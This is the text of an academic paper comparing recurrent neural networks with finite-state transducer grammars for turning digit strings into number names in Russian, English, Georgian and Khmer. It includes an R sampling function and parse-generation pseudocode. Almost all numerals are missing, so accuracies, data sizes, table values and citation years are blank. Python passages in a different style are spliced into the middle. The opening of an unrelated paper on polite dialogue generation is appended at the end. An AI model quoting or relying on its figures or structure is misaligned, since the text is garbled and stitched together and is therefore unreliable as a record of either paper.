in one set of experiments, we trained rnns to learn a mapping from digit sequences marked with morphosyntactic (case and gender) information, and their expression as russian cardinal number names. the motivation for choosing russian is that the num- ber name system of this language, like that of many slavic languages, is quite complicated, and therefore serves as a good test of the abilities of any text nor- malization system. the architecture used was similar to a network employed by rao et al. ( ) for grapheme- to-phoneme conversion, a superficially similar sequence-to-sequence mapping problem. we used a recurrent network with an input layer, four hidden feed-forward lstm layers (hochreiter and schmid- huber, ), and a connectionist temporal classi- fication (ctc) output layer with a softmax activa- tion function (graves et al., ). two of the hidden layers modeled forward sequences and the other two backward sequences. there were in- put nodes—corresponding to characters—and output nodes—corresponding to predicted number name words. each of the hidden layers had nodes. the full architecture is depicted in figure . the system was trained on m unique digit se- experiments with a non-ctc softmax output layer yielded consistently poor results, and we do not report them here. quences ranging from one to one million; these were collected by applying an existing tts text normal- ization system to several terabytes of web text. each training example consisted of a digit sequence, gen- der and case features, and the russian cardinal num- ber verbalization of that number. thus, for example, the system has to learn to produce the feminine in- strumental form of . examples of these mappings are shown in table , and the various inflected forms of a single cardinal number are given in table . in preliminary experiments, it was discovered that short digit sequences were poorly modeled due to under- sampling, so an additional , short sequence samples (of three or fewer digits) were added to com- pensate. . m examples ( %) were held out as a development set. the system was trained for one day, after which it had a % label error rate (ler) on the development data set. when decoding , tokens of held-out test data with this model, we achieved very high ac- curacy (ler < . ). the few remaining errors, however, are a serious obstacle to using this system for tts. the model appears to make no mistakes ap- plying inflectional suffixes to unseen data. plausibly, this task was made easier by our positioning of the morphological feature string at the end of the input, making it local to the output inflectional suffix (at least for the last word in the number expression). but it does make errors with respect to the numeric value of the expression. for example, for plu.ins. (девятью тысячами восьмьюстами одними), the system produced девятью тысячами семьюстами одними ( plu.ins.): the morphology is cor- rect, but the numeric value is wrong. this pattern of errors was exactly the opposite of what we want for speech applications. one might forgive a tts system that reads with the cor- rect numeric value but in the wrong case form: a lis- tener would likely notice the error but would usually not be misled about the message being conveyed. in contrast, reading it as nine thousand seven hundred and one is completely unacceptable, as this would actively mislead the listener. 
it is worth pointing out that the training set used here— m examples—was quite large, and we were the exact number of errors and their particular details var- ied from run to run. only able to obtain such a large amount of labeled data because we already had a high-quality hand- built grammar designed to do exactly this transduc- tion. it is simply unreasonable to expect that one could obtain this amount of parallel data for a new language (e.g., from naturally-occurring examples, or from speech transcriptions). this problem is es- pecially acute for low-resource languages (i.e., most of the world’s languages), where data is by defini- tion scarce, but where it is also hard to find high- quality linguistic resources or expertise, and where a machine learning approach is thus most needed. in conclusion, the system does not perform as well as we demand, nor is it in any case a practical solu- tion due to the large amount of training data needed. the rnn appears to have done an impressive job of learning the complex inflectional morphology of russian, but it occasionally chooses the wrong num- ber names altogether. number normalization with rnns for the purpose of more directly comparing the per- formance of rnns with the methods we report on below, we chose to ignore the issue of allomorphy and morphological concord, which appears to be “easy” for generic sequence models like rnns, and focus instead on verbalizing number expressions in whatever morphological category represents the lan- guage’s citation form. . data and general approach for our experiments we used three parallel data sets where the target number name was in citation form (in russian, nominative case): • a large set consisting of , examples ex- tracted from several terabytes of web text using an existing tts text normalization system • a medium set of , randomly-generated ex- amples (for details, see appendix a) • a minimal set of examples, consisting of the counting numbers up to , and carefully-chosen examples engineered to cover a wide variety of phenomena a separate set of , randomly-generated exam- ples were held out for evaluation. neu.gen. → пяти five mas.acc. → двадцать четыре twenty-four plu.ins. → девяноста девятью ninety-nine fem.nom. → одиннадцать eleven fem.gen. → восьмидесяти одной eighty-one fem.ins. → шестьюдесятью sixty neu.ins. → девяноста одним ninety-one mas.gen. → трёх three table : example input and output data (and glosses) for the russian rnn experiments. шестьдесят nominative (nom.) шестидесяти genitive (gen.) шестидесяти dative (dat.) шестьдесят accusative (acc.) шестьюдесятью instrumental (ins.) шестидесяти prepositional (pre.) table : inflectional forms of the cardinal number number “ ” in russian. the minimal set was intended to be representative of the sort of data one might obtain from a native- speaker when asked to provide all the essential infor- mation about number names in their language. in these experiments we used two different rnn models. the first was the same lstm architecture as above (henceforth referred to as “lstm”), except that the numbers of input and output nodes were and , respectively, due to the smaller input and out- put vocabularies. the second was a tensorflow-based rnn with an attention mechanism (mnih et al., ), using an overall architecture similar to that used in a system for end-to-end speech recognition (chan et al., ). 
specifically, we used a -layer pyramidal bidirec- tional lstm reader that reads input characters, a layer of attentional units, and a -layer decoder that produces word sequences. the reader is referred to chan et al., for further details. henceforth we refer to this model as “attention”. all models were trained for hours, at which point they were determined to have converged. note that the native speaker in question merely needs to be able to answer questions of the form “how do you say ‘ ’ in your language?”; they do not need to be linguistically trained. in contrast, hand-built grammars require at least some linguistic sophistication on the part of the grammarian. . results and discussion results for these experiments on a test corpus of , random examples are given in table . the rnn with attention clearly outperformed the lstm in that it performed perfectly with both the medium and large training sets, whereas the lstm made a small percentage of errors. note that since the numbers were in citation form, there was little room for the lstm to make inflectional errors, and the er- rors it made were all of the “silly” variety, in which the output simply denotes the wrong number. but neither system was capable of learning valid trans- ductions given just training examples. we draw two conclusions from these results. first, even a powerful machine learning model known to be applicable to a wide variety of problems may not be appropriate for all superficially-similar prob- lems. second, it remains to be seen whether any rnn could be designed to learn effectively from an amount of data as small as our smallest training set. learning from minimal data sets is of great practical concern, and we will proceed to provide a plausible solution to this problem below. we note again that very low error rates do not ensure that a system is the failure of the rnns to generalize from the minimal training set suggests they are evidently not expressive enough for the sort of “clever” inference that is needed to generalize from so little data. it is plausible that an alternative rnn archi- tecture could learn with such a small amount of data, though we leave it to future research to discover just what such an ar- chitecture might be. in an attempt to provide the rnns with additional support, we also performed an evaluation with the minimal training set in which inputs were encoded so that each decimal position above was represented with a letter (a for , b for , and so forth). thus was represented as c a . in principle, this ought to have prevented errors which fail to take positional information into account. unfortunately, this made no difference whatsoever. training size lstm acc. attention acc. overlap , . . % , . . % < . < . < % table : accuracies on a test corpus of , random russian citation-form number-name examples for the two rnn architectures. “overlap” indicates the percentage of the test examples that are also found in the training data. usable, since not all errors are equally forgivable. number normalization with finite-state transducers the problem of number normalization naturally de- composes into two subproblems: factorization and verbalization of the numeric factors. we first con- sider the latter problem, the simpler of the two. let λ be the set of number names in the target lan- guage, and let ν be the set of numerals, the integers denoted by a number name. then let l : ν∗ → λ∗ be a transducer which replaces a sequence of nu- merals with a sequence of number names. 
for in- stance, for english, l will map to ninety seven. in languages where there are multiple allomorphs or case forms for a numeral, l will be non-functional (i.e., one-to-many); we return to this issue shortly. in nearly all cases, however, there are no more than a few dozen numerals in ν, and no more than a few names in λ for the equivalent numeral in ν. there- fore, we assume it is possible to construct l with min- imal effort and minimal knowledge of the language. indeed, all the information needed to construct l for the experiments conducted in this paper can be found in english-language wikipedia articles. the remaining subproblem, factorization, is re- sponsible for converting digit sequences to numeral factors. in english, for example, is factored as . factorization is also language-specific. in standard french, for example, there is no sim- plex number name for ‘ ’; instead this is realized as quatre-vingt-dix “four twenty ten”, and thus (quatre-vingt-dix-sept mille) is factored as . it is not a priori obvious how one might go about learning language-specific factorizations. for at worst, a small number of languages, such as several indic languages of north india, effectively use unique numerals for all counting numbers up to . inspiration, we turn to a lesser-known body of lin- guistics research focusing on number grammars. hurford ( ) surveys cross-linguistic properties of number naming and proposes a syntactic repre- sentation which directly relates verbalized number names to the corresponding integers. hurford inter- prets complex number constructions as arithmetic expressions in which operators (and the parenthe- ses indicating associativity) have been elided. by far the two most common arithmetic operations are multiplication and addition. in french, for exam- ple, the expression dix-sept, literally ‘ten seven’, de- notes , the sum of its terms, and quatre-vingt(s), literally ‘four twenty’, refers to , the product of its terms. these may be combined, in quatre-vingt- dix-sept. to visualize arithmetic operations and as- sociativities, we henceforth write factorizations us- ing s-expressions—pre-order serializations of k-ary trees—with numeral terminals and arithmetic oper- ator non-terminals. for example, quatre-vingt-dix- sept is written (+ (* ) ). within any language there are cues to this elided arithmetic structure. in some languages, some or all addends are separated by a word translated as and. in other languages it is possible to determine whether terms are to be multiplied or summed depending on their relative magnitudes. in french (as in english), for instance, an expression xy usually is interpreted as a product if x < y, as in quatre-vingt(s) ‘ ’, but as a sum if x > y, as in vingt-quatre ‘ ’. thus the problem of number denormalization—that is, recov- ering the integer denoted by a verbalized number— can be thought of as a special case of grammar induc- tion from pairs of natural language expressions and some languages make use of half-counting, or multiplica- tion by one half (e.g., welsh hanner cant, ‘ ’, literally ‘half hundred’), or back-counting, i.e., subtraction (e.g., latin unde- vīgintī, ‘ ’, literally ‘one from twenty’; menninger, , f.). but these do not reduce the generality of the approach here. their denotations (e.g., kwiatkowski et al., ). . fst model the complete model consists of four components: . 
a language-independent covering grammar f, transducing from integers expressed as digit se- quences to the set of possible factorizations for that integer . a language-specific numeral map m, transduc- ing from digit sequences to numerals . a language-specific verbalization grammar g, accepting only those factorizations which are licit in the target language . a language-specific lexical map l, transducing from sequences of numerals (e.g., ) to num- ber names (already defined) as the final component, the lexical map l, has al- ready been described, we proceed to describe the re- maining three components of the system. . . finite-state transducer algorithms while we assume the reader has some familiarity with fsts, we first provide a brief review of a few key algorithms we employ below. our fst model is constructed using composition, denoted by the ◦ operator. when both arguments to composition are transducers, composition is equiva- lent to chaining the two relations described. for ex- ample, if a transduces string x to string y, and b trans- duces y to z, then a ◦ b transduces from string x to string z. when the left-hand side of composition is a transducer and the right-hand side is an accep- tor, then their composition produces a transducer in which the range of the left-hand side relation is inter- sected with the set of strings accepted by the right- hand side argument. thus if a transduces string x to strings {y, z}, and b accepts y then a ◦ b transduces from x to y. we make use of two other fundamental operations, namely inversion and projection. every transducer a has an inverse denoted by a− , which is the trans- ducer such that a− (y) → x if and only if a(x) → y. any transducer a also has input and output projec- tions denoted by πi(a) and πo(a), respectively. if the transducer a has the domain α∗ and the range β∗, then πi(a) is the acceptor over α∗ which accepts x if and only if a(x) → y for some y ∈ β∗; output pro- jection is defined similarly. the inverse, input pro- jection, and output projection of an fst (or a push- down transducer) are computed by swapping and/or copying the input or output labels of each arc in the machine. see mohri et al., for more details on these and other finite-state transducer algorithms. . . covering grammar let a be an fst which, when repeatedly applied to an arithmetic s-expression string, produces the s- expression’s value. for example, one application of a to (+ (* ) ) produces (+ ), and a second application produces . let μ be the set of s-expression markup symbols {‘(’, ‘)’, ‘+’, ‘*’} and Δ be the set { , , , . . . , }. then, f : Δ∗ → (μ ∪ Δ)∗ = a− ◦ a− ◦ a− . . . ( ) is an fst which transduces an integer expressed as a digit string to all its candidate factorizations expressed as s-expression strings. let c(d) = πo (d ◦ f), which maps from a digit sequence d to the set of all possible factorizations—in any language—of that digit sequence, encoded as s- expressions. for example, c( ) contains strings such as: (+ ) (+ ) (+ (* ) ) … . . grammar inference let m : (μ ∪ Δ)∗ → ν∗ be a transducer which deletes all markup symbols in μ and replaces se- quences of integers expressed as digit sequences with the appropriate numerals in ν. let d(l) = πi (m ◦ l ◦ l), which maps from a verbalization l to the set of all s-expressions which contain l as ter- minals. for example, d( ) contains: in practice, our s-expressions never have a depth exceeding five, so we assume f = a− ◦ a− ◦ a− ◦ a− ◦ a− . 
s → ( | | * | +) ∗ → ( | | +) + → table : a fragment of an english number grammar which accepts factorizations of the numbers { , , , , , and }. s represents the start symbol, and ‘|’ denotes disjunction. note that this fragment is regular rather than context-free, though this is rarely the case for complete grammars. (+ ) (+ (* )) (+ (* ) ) … then, given (d, l) where d ∈ Δ∗ is an integer ex- pressed as a digit sequence, and l ∈ λ∗ is d’s verbal- ization, their intersection e(d, l) = c(d) ◦ d(l) ( ) will contain the factorization(s) of d that verbalizes as l. in most cases, e will contain exactly one path for a given (d, l) pair. for instance, if d is and l is ninety seven thousand, e(d, l) is (* (+ ) ). we can use e to induce a context-free grammar (cfg) which accepts only those number verbaliza- tions present in the target language. the simplest pos- sible such cfg uses ‘*’ and ‘+’ as non-terminal la- bels, and the elements in the domain of l (e.g., ) as terminals. the grammar will then consist of binary productions extracted from the s-expression deriva- tions produced by e. table provides a fragment of such a grammar. with this approach, we face the familiar issues of ambiguity and sparsity. concerning the former, the output of e is not unique for all outputs. we address this either by applying normal form constraints on the set of permissible productions, or ignoring am- biguous examples during induction. one case of am- biguity involves expressions involving addition with or multiplication by , both identity operations that leave the identity element (i.e., or ) free to asso- ciate either to the left or to the right. from our per- spective, this ambiguity is spurious, so we stipulate that identity elements may only be siblings to (i.e., on the right-hand side of a production with) another digit → ( | | | … ) teen → ( | | | … ) decade → ( | | |… ) century → ( | | | … ) power_of_ten → ( | | …) table : optional preterminal rules. terminal. thus an expression like one thousand one hundred can only be parsed as (+ (* ) (* )). but not all ambiguities can be handled by normal form constraints. some expressions are am- biguous due to the presence of “palindromes” in the verbalization string. for instance, two hundred two can either be parsed as (+ (* )) or (+ (* )). the latter derivation is “correct” insofar as it follows the syntactic patterns of other english number expressions, but there is no way to deter- mine this except with reference to the very language- specific patterns we are attempting to learn. there- fore we ignore such expressions during grammar in- duction, forcing the relevant rules to be induced from unambiguous expressions. similarly, multiplication and addition are associative so expressions like three hundred thousand can be binarized either as (* (* ) ) or (* (* )), though both derivations are equally “correct”. once again we ig- nore such ambiguous expressions, instead extracting the relevant rules from unambiguous expressions. since we only admit two non-terminal labels, the vast majority of our rules contain numeral terminals on their right-hand sides, and as a result, the num- ber of rules tends to be roughly proportional to the size of the terminal vocabulary. thus it is common that we have observed, for instance, thirteen thou- sand and fourteen million but not fourteen thousand or thirteen million, and as a result, the cfg may be deficient simply due to sparsity in the training data, particularly in languages with large terminal vocab- ularies. 
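before turning to the preterminal classes used to mitigate this sparsity, the basic production-extraction step described above can be illustrated as follows. the example values are ours: english ninety seven thousand factors as (* (+ 90 7) 1000).

def parse_sexpr(s):
    # "(* (+ 90 7) 1000)" -> ["*", ["+", 90, 7], 1000]
    tokens = s.replace("(", " ( ").replace(")", " ) ").split()
    def read(i):
        if tokens[i] == "(":
            node, i = [tokens[i + 1]], i + 2
            while tokens[i] != ")":
                child, i = read(i)
                node.append(child)
            return node, i + 1
        return int(tokens[i]), i + 1
    return read(0)[0]

def productions(tree, rules=None):
    # collect productions with "+" and "*" as non-terminals and numerals as terminals
    if rules is None:
        rules = set()
    if isinstance(tree, int):
        return rules
    lhs, children = tree[0], tree[1:]
    rules.add((lhs, tuple(c if isinstance(c, int) else c[0] for c in children)))
    for child in children:
        productions(child, rules)
    return rules

print(productions(parse_sexpr("(* (+ 90 7) 1000)")))
# {("*", ("+", 1000)), ("+", (90, 7))}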
to enhance our ability to generalize from a small number of examples, we optionally insert preterminal labels during grammar induction to form classes of terminals assumed to pattern together in all productions. for instance, by introducing ‘teen’ and ‘power_of_ten’ preterminals, all four of the previous expressions are generated by the same top-level pro- duction. the full set of preterminal labels we use here are shown in table . in practice, obtaining productions using e is inef- ficient: it is roughly equivalent to a naïve algorithm which generates all possible derivations for the nu- merals given, then filters out all of those which do not evaluate to the expected total, violate the afore- mentioned normal form constraints, or are otherwise ambiguous. this fails to take advantage of top-down constraints derived from the particular structure of the problem. for example, the naïve algorithm en- tertains many candidate parses for quatre-vingt-dix- sept ‘ ’ where the root is ‘*’ and the first child is ‘ ’, despite the fact that no such hypothesis is viable as is not a divisor of . we inject arithmetic constraints into the gram- mar induction procedure, as follows. the inputs to the modified algorithm are tuples of the form (t, ν , . . . , νn) where t is the numeric value of the expression and ν , . . . , νn are the n + numerals in the verbalization. consider a hypothesized numeric value of the leftmost child of the root, t ...i, which dominates ν , . . . , νi where i < n. for this to be vi- able, it must be the case that t ...i ≤ t. and, if we further hypothesize that the root node is ‘+’, then the remaining children must evaluate to t−t ...i. simi- larly, if we hypothesize that the root node is ‘*’, then the remaining children must evaluate to t/t ...i, and this quantity must be integral. this approach can be implemented with a back- tracking recursive descent parser enforcing the afore- mentioned normal form constraints and propagat- ing the top-down arithmetic constraints. in practice, however, we implement the search using a straight- forward dynamic programming algorithm. the algo- rithm proceeds by recursively generating all possi- ble leftmost children of the tree and then using these top-down constraints to prune branches of the search space which have no viable completion (though our implementation does not fully propagate these con- straints). while the number of left subtrees is expo- nential in the length of the verbalization, our imple- mentation remains feasible since real-world exam- ples tend to have verbalizations consisting of rela- tively few terminals. pseudocode for our implemen- tation is provided in appendix b. . . grammar compilation once productions have been collected, they are used to specify a recursive transition network (woods, ) which is then compiled into a push- down acceptor (allauzen and riley, ) over ν∗, henceforth g. an example is shown in figure . . . final model and remaining issues then, the verbalization for d is given by v(d) = πo (d ◦ f ◦ m ◦ g ◦ l) . ( ) as noted above, the lexicon transducer l is non- functional when there are multiple number names for a single numeral, as may arise in number systems with allomorphy or morphological concord. when this is the case, we compose the lattice produced byv with a language model (lm) of verbalized numbers (over λ∗) and then decode using the shortest path al- gorithm. note that whereas the construction of g re- quires parallel data, the lm requires only “spoken” data. 
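a runnable sketch of this constrained search (the procedure given as pseudocode in appendix b) is shown below; the normal-form and ambiguity filters described earlier are omitted for brevity, and the example values are illustrative rather than drawn from the training data.

def subtrees(nums):
    # enumerate (value, s-expression) pairs for all labeled binary trees over nums
    if len(nums) == 1:
        yield nums[0], str(nums[0])
        return
    for i in range(1, len(nums)):
        for lv, ls in subtrees(nums[:i]):
            for rv, rs in subtrees(nums[i:]):
                yield lv + rv, f"(+ {ls} {rs})"
                yield lv * rv, f"(* {ls} {rs})"

def get_oracles(total, nums):
    # yield s-expressions over nums that evaluate to total, pruning hypotheses
    # with the top-down arithmetic constraints described above
    if len(nums) == 1:
        if nums[0] == total:
            yield str(nums[0])
        return
    for i in range(1, len(nums)):               # size of the left child
        for lv, ls in subtrees(nums[:i]):       # all possible left subtrees
            if lv > total or lv == 0:
                continue                        # no viable completion
            rem = total - lv                    # hypothesize a "+" root
            if rem > 0:
                for rs in get_oracles(rem, nums[i:]):
                    yield f"(+ {ls} {rs})"
            if total % lv == 0:                 # hypothesize a "*" root
                for rs in get_oracles(total // lv, nums[i:]):
                    yield f"(* {ls} {rs})"

# french quatre vingt dix sept ("97") with numerals [4, 20, 10, 7]:
print(list(get_oracles(97, [4, 20, 10, 7])))
# both binarizations are returned; the induction step discards such ambiguous cases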
while it is not common in most languages to write out complex cardinal numbers in their verbal- ized form, it is nonetheless possible to find a large sample of such expressions at web scale (sproat, ); such expressions can be identified by match- ing against the unweighted πo (f ◦ m ◦ g ◦ l). . materials and methods the fst-based verbalizer v was constructed and evaluated using four languages: english, georgian, khmer, and russian (the latter targeting citation forms only). the medium and minimal sets are used for all four languages; in russian, we also reuse the large data set (see § . ). in all cases the test sets consisted of , randomly generated examples, the same examples as in previous experiments. the size of v varied by language, with the small- est, english, consisting of roughly , states and arcs, and the largest, russian, measuring roughly , states and arcs and comprising approximately a megabyte of uncompressed binary data. no lm was required for either english or khmer as both have a functional l. however, the georgian and russian l are both ambiguous, so the best path through the output lattice was selected according to a trigram language model with witten-bell smooth- ing. the language models were constructed using the medium training set. (* (+ (+ )* )+)+ figure : a pushdown acceptor that accepts all the language of the grammar fragment in table . arc labels that contain parentheses indicate “push” and “pop” stack operations, respectively, and must balance along a path. locale training size num. acc. morph. acc. overlap eng_us , . . % . . < % kat_ge , . . % . . < % khm_kh , . . % . . < % rus_ru , . . % , . . % . . < % table : evaluation of the fst verbalizer on english (eng_us), georgian (kat_ge), khmer (kmh_kh), and russian (rus_ru); errors are separated into those which affect the numeric denotation (“num. acc.”) and those which merely use incorrect morphological forms (“morph. acc.”). . results and discussion the results were excellent for all four languages. there were no errors at all in english, georgian, and khmer with either data set. while there were a few errors in russian, crucially all were agree- ment errors rather than errors in the factorization itself, exactly the opposite pattern of error to the ones we observed with the lstm model. for example, , , was rendered as семьдесят миллион четыреста семьдесят семь тысяч сто семьдесят; the second word should be миллионов, the genitive plural form. more surprisingly, verbalizers trained on the examples of the minimal data set per- formed just as well as ones trained with two orders of magnitude more labeled data. discussion we presented two approaches to number normaliza- tion. the first used a general rnn architecture that has been used for other sequence mapping problems, and the second an fst-based system that uses a fair amount of domain knowledge. the rnn approach can achieve very high accuracy, but with two caveats: it requires a large amount of training data, and the er- rors it makes may result in the wrong number. the fst-based solution on the other hand can learn from a tiny dataset, and never makes that particularly per- nicious type of error. the small size of training data needed and the high accuracy make this a particu- larly attractive approach for low-resource scenarios. in fact, we suspect that the fst model could be made to learn from a smaller number of examples than the that make up the “minimal” set. 
finding the minimum number of examples necessary to cover the entire number grammar appears to be a case of the set cover problem, which is np-complete (karp, ), but it is plausible that a greedy algorithm could identify an even smaller training set. the grammar induction method used for the fst verbalizer is nearly the simplest imaginable such procedure: it treats rules as well-formed if and only if they have at least one unambiguous occurrence in the training data. more sophisticated induction methods could be used to improve both generalization and robustness to errors in the training data. generalization might be improved by methods that "hallucinate" unobserved productions (mohri and roark, ), and robustness could be improved using manual or automated tree annotation (e.g., klein and manning, ; petrov and klein, ). we leave this for future work. above, we focused solely on cardinal numbers, and specifically their citation forms. however, in all four languages studied here, ordinal numbers share the same factorization and differ only superficially from cardinals. in this case, the ordinal number verbalizer can be constructed by applying a trivial transduction to the cardinal number verbalizer. however, it is an open question whether this is universal or whether there may be some languages in which the discrepancy is much greater, so that separate methods are necessary to construct the ordinal verbalizer. the fst verbalizer does not provide any mechanism for verbalizing numbers in morphological contexts other than citation form. one possibility would be to use a discriminative model to select the most appropriate morphological variant of a number in context. we also leave this for future work. one desirable property of the fst-based system is that fsts (and pdts) are trivially invertible: if one builds a transducer that maps from digit sequences to number names, one can invert it, resulting in a transducer that maps number names to digit sequences. (invertibility is not a property of any rnn solution.) this allows one, with the help of an appropriate target-side language model, to convert a normalization system into a denormalization system that maps from spoken to written form rather than from written to spoken. during asr decoding, for example, it is often preferable to use spoken representations (e.g., twenty-three) rather than written forms (e.g., ), and then perform denormalization on the resulting transcripts so they can be displayed to users in a more readable form (shugrina, ; vasserman et al., ). in ongoing work we are evaluating fst verbalizers for use in asr denormalization. conclusions we have described two approaches to number normalization, a key component of speech recognition and synthesis systems. the first used a recurrent neural network and large amounts of training data, but very little knowledge about the problem space. the second used finite-state transducers and a learning method totally specialized for this domain, but which requires very little training data. while the former approach is certainly more appealing given current trends in nlp, only the latter is feasible for the low-resource languages which most need an automated approach to text normalization. to be sure, we have not demonstrated that rnns, or similar models, are inapplicable to this problem, nor does it seem possible to do so.
how- ever, number normalization is arguably a sequence- to-sequence transduction problem, and rnns have been shown to be viable end-to-end solutions for sim- ilar problems, including grapheme-to-phoneme con- version (rao et al., ) and machine translation (sutskever et al., ), so one might reasonably have expected them to have performed better without making the “silly” errors that we observed. much of the recent rhetoric about deep learning suggests that neural networks obviate the need for incorporating detailed knowledge of the problem to be solved; in- stead, one merely needs to feed pairs consisting of inputs and the required outputs, and the system will self-organize to learn the desired mapping (graves and jaitly, ). while that is certainly a desirable ideal, for this problem one can achieve a much more compact and data-efficient solution if one is willing to exploit knowledge of the domain. acknowledgements thanks to cyril allauzen, jason eisner, michael ri- ley, brian roark, and ke wu for helpful discus- sion, and to navdeep jaitly and haşim sak for as- sistance with rnn modeling. all finite-state mod- els were constructed using the opengrm libraries (http://opengrm.org). references cyril allauzen and michael riley. . a pushdown transducer extension for the openfst library. in ciaa, pages – . richard beaufort, sophie roekhaut, louise-amélie cougnon, and cédrick fairon. . a hybrid rule/model-based finite-state framework for normaliz- ing sms messages. in acl, pages – . william chan, navdeep jaitly, quoc v. le, and oriol vinyals. . listen, attend and spell: a neural net- work for large vocabulary conversational speech recog- nition. in icassp, pages – . jeffrey t. chang, hinrich schütze, and russ b. altman. . creating an online dictionary of abbreviations from medline. journal of the american medical in- formatics association, ( ): – . h. brandt corstius, editor. . grammars for number names. d. reidel, dordrecht. peter ebden and richard sproat. . the kestrel tts text normalization system. natural language engi- neering, ( ): – . alex graves and navdeep jaitly. . towards end-to- end speech recognition with recurrent neural networks. in icml, pages – . alex graves, santiago fernández, gaustino gomez, and jürgen schmidhuber. . connectionist tempo- ral classification: labeling unsegmented sequence data with recurrent neural networks. in icml, pages – . sepp hochreiter and jürgen schmidhuber. . long short-term memory. neural computation, ( ): – . james r. hurford. . the linguistic theory of nu- merals. cambridge university press, cambridge. jakub kanis, jan zelinka, and luděk müller. . auto- matic number normalization in inflectional languages. in specom, pages – . richard m. karp. . reducibility among combina- torial problems. in raymond e. miller and james w. thatcher, editors, complexity of computer computa- tions, pages – . plenum, new york. dan klein and christopher d. manning. . accurate unlexicalized parsing. in acl, pages – . tom kwiatkowski, luke zettlemoyer, sharon goldwater, and mark steedman. . lexical generalization in ccg grammar induction for semantic parsing. in emnlp, pages – . karl menninger. . number words and number sym- bols. mit press, cambridge. translation of zahlwort und ziffer, published by vanderhoeck & ruprecht, breslau, . volodymyr mnih, nicolas heess, alex graves, and ko- ray kavukcuoglu. . recurrent models of visual attention. in nips, pages – . mehryar mohri and brian roark. . probabilistic context-free grammar induction based on structural ze- ros. 
in naacl, pages – . mehryar mohri, fernando pereira, and michael riley. . weighted finite-state transducers in speech recognition. computer speech & language, ( ): – . deana pennell and yang liu. . toward text message normalization: modeling abbreviation generation. in icassp, pages – . slav petrov and dan klein. . improved inference for unlexicalized parsing. in naacl, pages – . kanishka rao, fuchun peng, haşim sak, and françoise beaufays. . grapheme-to-phoneme conversion using long short-term memory recurrent neural net- works. in icassp, pages – . brian roark and richard sproat. . hippocratic ab- breviation expansion. in acl, pages – . maria shugrina. . formatting time-aligned asr transcripts for readability. in naacl, pages – . richard sproat, alan w. black, stanley chen, shankar kumar, mari ostendorf, and christopher richards. . normalization of non-standard words. com- puter speech and language, ( ): – . richard sproat. . multilingual text analysis for text- to-speech synthesis. natural language engineering, ( ): – . richard sproat. . lightly supervised learning of text normalization: russian number names. in ieee work- shop on speech and language technology, pages – . ilya sutskever, oriol vinyals, and quoc v. le. . se- quence to sequence learning with neural networks. in nips, pages – . paul taylor. . text to speech synthesis. cambridge university press, cambridge. lucy vasserman, vlad schogol, and keith hall. . sequence-based class tagging for robust transcription in asr. in interspeech, pages – . william a. woods. . transition network grammars for natural language analysis. communications of the acm, ( ): – . yi yang and jacob eisenstein. . a log-linear model for unsupervised text normalization. in emnlp, pages – . a random sampling procedure random-generated data sets were produced by sampling from a yule-simon distribution with ρ = , then rounding each sample’s k trailing digits, where k is a random variable in the discrete uniform distribution u{ , n} and n is the order of the sampled number. duplicate samples were then removed. the following r function implements this procedure. require(vgam) epsilon <- e- rnumbers <- function(n) { x <- ryules(n, rho= ) num.digits <- floor(log (x + epsilon)) + sig.digits <- ceiling(runif(n, min= , max=num.digits)) unique(signif(x, sig.digits)) } b parse generation algorithm the following algorithm is used to generate parses from parallel (written/spoken) data. it depends upon a procedure getsubtrees(…) generating all possible labeled binary subtrees given a sequence of terminals, which is left as an exercise to the reader. : procedure getoracles(t, v , …, vn) ▷ total t, terminals v , …, vn. : if n = then : if eval(v ) = t then : yield s-expression v : end if : return : end if : for i ∈ . . . n− do ▷ size of left child. : for all l ∈ getsubtrees(v , …, vi) do : tl ← eval(l) : tr ← t − tl ▷ hypothesizes + root. : if tr > then : for all r ∈ getoracles(tr, vi+ , …, vn) do : yield s-expression (+ l r) : end for : end if : tr ← t / tl ▷ hypothesizes * root. : if tr ∈n then ▷ “is a natural number”. 
: for all r ∈ getoracles(tr, vi+ , …, vn) do : yield s-expression (* l r) : end for : end if : end for : end for : end procedure polite dialogue generation without parallel data tong niu and mohit bansal unc chapel hill {tongn, mbansal}@cs.unc.edu abstract stylistic dialogue response generation, with valuable applications in personality-based conversational agents, is a challenging task because the response needs to be fluent, contextually-relevant, as well as paralinguis- tically accurate. moreover, parallel datasets for regular-to-stylistic pairs are usually un- available. we present three weakly-supervised models that can generate diverse, polite (or rude) dialogue responses without parallel data. our late fusion model (fusion) merges the decoder of an encoder-attention-decoder dia- logue model with a language model trained on stand-alone polite utterances. our label-fine- tuning (lft) model prepends to each source sequence a politeness-score scaled label (pre- dicted by our state-of-the-art politeness classi- fier) during training, and at test time is able to generate polite, neutral, and rude responses by simply scaling the label embedding by the cor- responding score. our reinforcement learn- ing model (polite-rl) encourages politeness generation by assigning rewards proportional to the politeness classifier score of the sam- pled response. we also present two retrieval- based, polite dialogue model baselines. hu- man evaluation validates that while the fu- sion and the retrieval-based models achieve politeness with poorer context-relevance, the lft and polite-rl models can produce sig- nificantly more polite responses without sacri- ficing dialogue quality. introduction generating stylistic, personality-based language is crucial to developing engaging, convincing, and trustworthy conversational agents, for their effec- tive application in intelligent tutoring, home assis- tance, online reservations/purchasing, health care, etc. most current chatbots and conversational mod- els lack any such style, which can be a social issue because human users might learn biased styles from such interactions, e.g., kids learning to be rude be- cause the dialogue system encourages short, curt re- sponses, and also does not itself use politeness to set an example. in this work, we focus on the impor- tant and diverse paralinguistic style axis of polite- ness vs. rudeness (brown and levinson, ). generating stylistic dialogue responses is a sub- stantially challenging task because the generated re- sponse needs to be syntactically and semantically fluent, contextually-relevant to the conversation, as well as convey accurate paralinguistic features. this is further complicated by the fact that content and style are only available in separate unpaired datasets, as opposed to translation-type parallel datasets con- taining regular-to-stylistic text pairs. hence, we need indirectly-supervised models that can incorpo- rate style into the generated response in absence of parallel data (i.e., where the training data for the conversation, versus style components, comes from two different datasets or domains), while still main- taining conversation relevance. in this work, we present three such weakly- supervised models that can generate diverse, nat- ural, and contextually-relevant polite (and rude) di- https://qz.com/ /parents-are-worried-the-amazon- echo-is-conditioning-their-kids-to-be-rude/ the first version of this paper with the three fusion, discrete-lft, and polite-rl models was submitted on oct , . 
